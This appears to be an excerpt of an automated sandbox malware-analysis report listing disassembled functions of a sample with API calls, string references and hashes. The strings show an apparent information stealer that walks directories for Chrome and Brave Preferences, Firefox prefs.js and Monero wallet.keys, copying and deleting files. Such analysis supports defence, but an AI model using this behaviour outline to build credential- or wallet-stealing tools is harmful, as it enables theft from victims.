                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 50c56a1d86340a7e803655ed90db06c9555e482adee29d4505fb9714daa6cd7f
                          • Instruction ID: 54b263323dd3b240ec3bf5fa026e5a81399a0918b9525c477050eeb46551e1e0
                          • Opcode Fuzzy Hash: 50c56a1d86340a7e803655ed90db06c9555e482adee29d4505fb9714daa6cd7f
                          • Instruction Fuzzy Hash: B3A164B1A007289FDB64DF64DC85FEE737ABB48301F04459CA60D96141EB759B84CF52
                          Function 0061BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00630B32,00630B2B,00000000,?,?,?,006313F4,00630B2A), ref: 0061BEF5
                          • StrCmpCA.SHLWAPI(?,006313F8), ref: 0061BF4D
                          • StrCmpCA.SHLWAPI(?,006313FC), ref: 0061BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0061C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: b77ce2c554f3e75c8fedc561496bf99225a68c2f31fd845b00a404e75f2e9ae6
                          • Instruction ID: c5190b1fd490e5fa70ee9421a9dbd025ee1a1aaa605738ddf83ae0f6fbb450e9
                          • Opcode Fuzzy Hash: b77ce2c554f3e75c8fedc561496bf99225a68c2f31fd845b00a404e75f2e9ae6
                          • Instruction Fuzzy Hash: 1B4262729105189BCB54FBA0EC96EED737FAF48300F40455CF90A96181EE749B49CF9A
                          Function 00624910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0062492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00624943
                          • StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                          • StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                          • FindClose.KERNEL32(000000FF), ref: 00624B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 0122672b85aeefdb1ed7dacadd3ad01c7d48ad2f2d4dea867f29c4c305102e55
                          • Instruction ID: c5cff2fef365ca9d8cb96faa1eef5dce87020c50872b0e430c2577ed915d922a
                          • Opcode Fuzzy Hash: 0122672b85aeefdb1ed7dacadd3ad01c7d48ad2f2d4dea867f29c4c305102e55
                          • Instruction Fuzzy Hash: 2F615BB1900618ABCB24EBA0EC85EEA737DBB48701F04469CF64996141EF75DB89CF91
                          Function 00624570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00624580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00624587
                          • wsprintfA.USER32 ref: 006245A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 006245BD
                          • StrCmpCA.SHLWAPI(?,00630FC4), ref: 006245EB
                          • StrCmpCA.SHLWAPI(?,00630FC8), ref: 00624601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0062468B
                          • FindClose.KERNEL32(000000FF), ref: 006246A0
                          • lstrcat.KERNEL32(?,0111E8D8), ref: 006246C5
                          • lstrcat.KERNEL32(?,0111DA20), ref: 006246D8
                          • lstrlen.KERNEL32(?), ref: 006246E5
                          • lstrlen.KERNEL32(?), ref: 006246F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 69cd201b2b98349b0dd145e00853b377c31342479ce2a4170d2fb7d3756b1275
                          • Instruction ID: e5a9cadada346b2412d8e3f808a21582fad852090897e8e3c7322272dc63fddc
                          • Opcode Fuzzy Hash: 69cd201b2b98349b0dd145e00853b377c31342479ce2a4170d2fb7d3756b1275
                          • Instruction Fuzzy Hash: 695144B1900218AFCB64EB70DC89FED737DBB58701F404698F64996190EF799B848F92
                          Function 00623EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00623EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00623EDA
                          • StrCmpCA.SHLWAPI(?,00630FAC), ref: 00623F08
                          • StrCmpCA.SHLWAPI(?,00630FB0), ref: 00623F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0062406C
                          • FindClose.KERNEL32(000000FF), ref: 00624081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5fdc0ec64e2ec1472ef5fba5b2ce6c22d6e76d17b5c7ab9e8474262189a5271b
                          • Instruction ID: 50ef8b7d85083027b90da5a2d7f80121321264ec62fc3c66bf3b6c4daba9fadc
                          • Opcode Fuzzy Hash: 5fdc0ec64e2ec1472ef5fba5b2ce6c22d6e76d17b5c7ab9e8474262189a5271b
                          • Instruction Fuzzy Hash: 055178B2900628ABCB24EBB0EC85EEE737DBB44301F04469CB75996140DB75DB89CF95
                          Function 0061ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0061ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0061ED55
                          • StrCmpCA.SHLWAPI(?,00631538), ref: 0061EDAB
                          • StrCmpCA.SHLWAPI(?,0063153C), ref: 0061EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0061F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 2d34a05e05b6cdbbb6cc466cc3890d402382b8714dae79f147b1db358723e719
                          • Instruction ID: a1baca7e93c06de205866a0bbb80987e0e2c311494a6d0110eaa2c245d50ae7d
                          • Opcode Fuzzy Hash: 2d34a05e05b6cdbbb6cc466cc3890d402382b8714dae79f147b1db358723e719
                          • Instruction Fuzzy Hash: 37E125719115289BDB94FBA0EC52EEE733AAF54300F40459DF40A62092EF746F8ACF56
                          Function 0061F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006315B8,00630D96), ref: 0061F71E
                          • StrCmpCA.SHLWAPI(?,006315BC), ref: 0061F76F
                          • StrCmpCA.SHLWAPI(?,006315C0), ref: 0061F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0061FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: bda18b682d515fd6afb45ec02f100349fc7466307ad4c48521eb3e8043b8a6a9
                          • Instruction ID: 43d5a5367681abd46212f161122fc309c6a25b1cd63e12c492acb26c57937eb9
                          • Opcode Fuzzy Hash: bda18b682d515fd6afb45ec02f100349fc7466307ad4c48521eb3e8043b8a6a9
                          • Instruction Fuzzy Hash: 6EB165719005189BDB64FFA0EC96AED737BAF54300F4085ACE40A97181EF74AB49CF96
                          Function 006116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0063510C,?,?,?,006351B4,?,?,00000000,?,00000000), ref: 00611923
                          • StrCmpCA.SHLWAPI(?,0063525C), ref: 00611973
                          • StrCmpCA.SHLWAPI(?,00635304), ref: 00611989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00611D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00611DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00611E20
                          • FindClose.KERNEL32(000000FF), ref: 00611E32
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 81981fc70809a68b247b7e3c4db6be28069922f71b84ee1eba92e0e838462a84
                          • Instruction ID: 6f9873a3d080bbdccfc68a32b01ae690a95a6a1fb8e6c5105c09cafd4793329d
                          • Opcode Fuzzy Hash: 81981fc70809a68b247b7e3c4db6be28069922f71b84ee1eba92e0e838462a84
                          • Instruction Fuzzy Hash: 8F1295719115289BCB59FBA0EC96EEE733AAF14300F40459DF10662091EFB46F89CF96
                          Function 0061DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00630C2E), ref: 0061DE5E
                          • StrCmpCA.SHLWAPI(?,006314C8), ref: 0061DEAE
                          • StrCmpCA.SHLWAPI(?,006314CC), ref: 0061DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0061E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 6049e71031965e4710535b15e43f1e736adb312cdacc6af9cad6ab2c9d9ed7fe
                          • Instruction ID: b1edf19aeadbfac2b4b94d77124d10be387e7ab84cd7bb0ae2c4cc1900a1cfad
                          • Opcode Fuzzy Hash: 6049e71031965e4710535b15e43f1e736adb312cdacc6af9cad6ab2c9d9ed7fe
                          • Instruction Fuzzy Hash: 3FF190718105289BDB59EBA0EC95EEE737ABF18300F4045DDE40A62091EF746B8ACF56
                          Function 009C9A3A Relevance: 14.1, Strings: 10, Instructions: 1599COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: wz$$7$0L>$@GO$@dm$HG{}$h "i$ra>$h~;$9w
                          • API String ID: 0-1766348267
                          • Opcode ID: c2d6116cac7547c841c5b47e5db22991045b9c42992c144677d45a16b8bab8a2
                          • Instruction ID: f584fc852e82aa53fb82dc8a67cd20cd127a62712769553dad8fab6e6fbff937
                          • Opcode Fuzzy Hash: c2d6116cac7547c841c5b47e5db22991045b9c42992c144677d45a16b8bab8a2
